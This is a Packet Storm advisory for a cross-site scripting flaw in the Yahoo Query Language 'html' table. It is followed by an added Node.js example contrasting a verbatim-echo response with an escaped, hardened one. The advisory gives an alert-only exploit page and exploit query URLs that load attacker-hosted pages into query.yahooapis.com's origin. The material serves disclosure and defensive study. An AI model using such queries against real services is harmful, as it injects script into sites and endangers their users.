Yahoo Query Language Cross Site Scripting

2015-03-08T00:00:00
ID PACKETSTORM:130718
Type packetstorm
Reporter C4T
Modified 2015-03-08T00:00:00

Description

`/***********************************************************************************  
** Exploit Title: Yahoo Query Language Cross Site Scripting Vulnerability  
**  
** Exploit Author: Peyman D. aka C4T  
**  
** Vendor Homepage : http://query.yahooapis.com/  
**  
** Google Dork: none  
**  
** Date: 2015-03-08  
**  
** Tested on: Windows 7 / Mozilla Firefox  
**  
************************************************************************************  
** Exploit Code:  
******************  
  
<html xmlns="http://www.w3.org/1999/xhtml">  
<body>  
<span>Discovered by Peyman D.</span>  
<span>aka C4T</span>  
<script>  
alert('Successfully Exploited');  
</script>  
</body>  
</html>  
  
************************************************************************************  
Location & Vulnerable query:  
******************  
  
The YQL `html` table fetches the page named by `url` and returns the nodes matched by `xpath`; with xpath='html' the whole fetched document is echoed back in the API response. Pointing `url` at an attacker-controlled page therefore puts attacker markup into a page served from query.yahooapis.com (spaces in `q` are shown unencoded here, as in the original):  
  
http://query.yahooapis.com/v1/public/yql?q=select * from html where url='[attacker-website.com]/exploit.html' and xpath='html'  
  
*************************************************************************************  
** Proof:  
******************  
  
Script tag from the fetched page executes in the API's own origin (the alert from exploit.html fires on query.yahooapis.com):  
  
Malicious source: http://hatrhyme.com/alert.html  
Exploit query:  
http://query.yahooapis.com/v1/public/yql?q=select * from html where url='http://hatrhyme.com/alert.html' and xpath='html'  
  
-------------------------------------------------------  
  
Arbitrary HTML tags from the fetched page are rendered in the API's own page:  
  
Malicious source: http://hatrhyme.com/expl.html  
Exploit query:  
http://query.yahooapis.com/v1/public/yql?q=select * from html where url='http://hatrhyme.com/expl.html' and xpath='html'  
  
-------------------------------------------------------  
******************************************************************************************  
**  
** Explanation and the cause of this vulnerability:  
**  
** http://hatrhyme.com/XSSInYQL.pdf  
**  
******************************************************************************************  
`
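Added example (not part of the advisory and not Yahoo's code): a Node.js model of how an HTML-fetching API like the YQL `html` table echoes a third-party document back to the caller, contrasting a response that splices the fetched nodes verbatim into its XML envelope with one that returns them as escaped text under headers that stop the browser from rendering the body. The function names, the envelope shape and the header set are assumptions; the sample document is constructed to mirror the advisory's exploit.html. Note the `xmlns="http://www.w3.org/1999/xhtml"` declaration the exploit carries: Firefox treats XHTML-namespaced elements inside any XML document as live markup and runs their script, so a verbatim echo in an XML response is enough for the alert to fire. That reading is inferred from the exploit, not stated on this page; the linked PDF gives the author's explanation.

```javascript
// Added example, not from the advisory. Models an HTML-fetching API endpoint
// that returns nodes selected from a third-party page. All names are hypothetical.

// Constructed sample: the attacker-controlled page the query points at,
// mirroring the advisory's exploit.html including its XHTML namespace.
const ATTACKER_HTML =
  '<html xmlns="http://www.w3.org/1999/xhtml"><body>' +
  "<script>alert('Successfully Exploited');</script></body></html>";

// Weak: the fetched nodes are spliced verbatim into the XML envelope. When a
// browser renders this response directly, the XHTML-namespaced <script> is live.
function vulnerableResponse(fetchedMarkup) {
  return {
    headers: { 'Content-Type': 'text/xml; charset=utf-8' },
    body: `<?xml version="1.0"?><query><results>${fetchedMarkup}</results></query>`,
  };
}

// Entity-escape the five XML metacharacters so fetched markup travels as text.
function escapeXml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&apos;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// JSON.stringify leaves '<', '>' and '&' intact; escape them (and the JS line
// terminators) so the body cannot be read as markup even if MIME-sniffed.
function jsonForTransport(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened: escaped payload plus headers that keep the response from being
// rendered as a document. format 'xml' keeps the XML envelope; default is JSON
// (YQL itself offers format=json; the header choices here are assumptions).
function hardenedResponse(fetchedMarkup, format = 'json') {
  const headers = {
    'X-Content-Type-Options': 'nosniff',                 // no sniffing to text/html
    'Content-Disposition': 'attachment; filename="response"', // not rendered on navigation
    'Content-Security-Policy': "default-src 'none'",   // no script even if rendered
  };
  if (format === 'xml') {
    headers['Content-Type'] = 'text/xml; charset=utf-8';
    const body = `<?xml version="1.0"?><query><results>${escapeXml(fetchedMarkup)}</results></query>`;
    return { headers, body };
  }
  headers['Content-Type'] = 'application/json; charset=utf-8';
  return { headers, body: jsonForTransport({ query: { results: fetchedMarkup } }) };
}

// Reviewer check: does the wire body still contain a raw <script element?
function hasLiveScript(response) {
  return /<script\b/i.test(response.body);
}

module.exports = { ATTACKER_HTML, vulnerableResponse, hardenedResponse, hasLiveScript, escapeXml, jsonForTransport };
```

Run with `node` and compare `hasLiveScript(vulnerableResponse(ATTACKER_HTML))` against the hardened variants: the vulnerable envelope carries the attacker's `<script>` verbatim, the XML variant carries only `&lt;script&gt;`, and the JSON variant carries `\u003cscript` while `JSON.parse` still recovers the fetched markup intact for the legitimate API consumer.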